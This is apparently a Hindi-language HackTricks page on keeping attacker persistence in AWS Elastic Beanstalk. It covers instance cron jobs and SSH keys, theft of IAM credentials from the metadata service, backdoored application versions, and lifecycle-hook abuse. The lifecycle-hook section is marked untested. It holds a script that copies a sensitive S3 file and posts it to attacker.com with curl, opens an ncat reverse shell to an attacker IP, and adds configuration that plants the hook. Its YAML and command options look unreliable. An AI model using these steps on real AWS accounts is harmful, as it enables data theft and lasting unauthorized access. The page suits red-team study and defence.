AWS - Elastic Beanstalk Persistence

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
💬 Discord group में शामिल हों या telegram group में या Twitter पर 🐦 @carlospolopm को फॉलो करें.
HackTricks और HackTricks Cloud github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.

Elastic Beanstalk

अधिक जानकारी के लिए देखें:

इंस्टेंस में पर्सिस्टेंस

AWS अकाउंट के अंदर पर्सिस्टेंस बनाए रखने के लिए, कुछ पर्सिस्टेंस मैकेनिज्म को इंस्टेंस के अंदर पेश किया जा सकता है (cron job, ssh key...) ताकि हमलावर इसे एक्सेस कर सके और मेटाडेटा सर्विस से IAM रोल क्रेडेंशियल्स चुरा सके.

वर्जन में बैकडोर

एक हमलावर S3 रेपो के अंदर कोड में बैकडोर डाल सकता है ताकि यह हमेशा अपना बैकडोर और अपेक्षित कोड चलाए.

नया बैकडोर्ड वर्जन

वास्तविक वर्जन पर कोड बदलने के बजाय, हमलावर एप्लिकेशन का एक नया बैकडोर्ड वर्जन डिप्लॉय कर सकता है.

कस्टम रिसोर्स लाइफसाइकल हुक्स का दुरुपयोग

TODO: परीक्षण करें

Elastic Beanstalk लाइफसाइकल हुक्स प्रदान करता है जो आपको इंस्टेंस प्रोविजनिंग और टर्मिनेशन के दौरान कस्टम स्क्रिप्ट्स चलाने की अनुमति देते हैं। एक हमलावर लाइफसाइकल हुक को कॉन्फ़िगर कर सकता है ताकि यह नियमित रूप से एक स्क्रिप्ट चलाए जो डेटा एक्सफिल्ट्रेट करती है या AWS अकाउंट तक पहुँच बनाए रखती है.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"

शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
💬 Discord group में शामिल हों या telegram group में या Twitter 🐦 पर मुझे फॉलो करें @carlospolopm.
HackTricks और HackTricks Cloud github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

PreviousAWS - ECS Persistence NextAWS - EFS Persistence

Last updated 4 months ago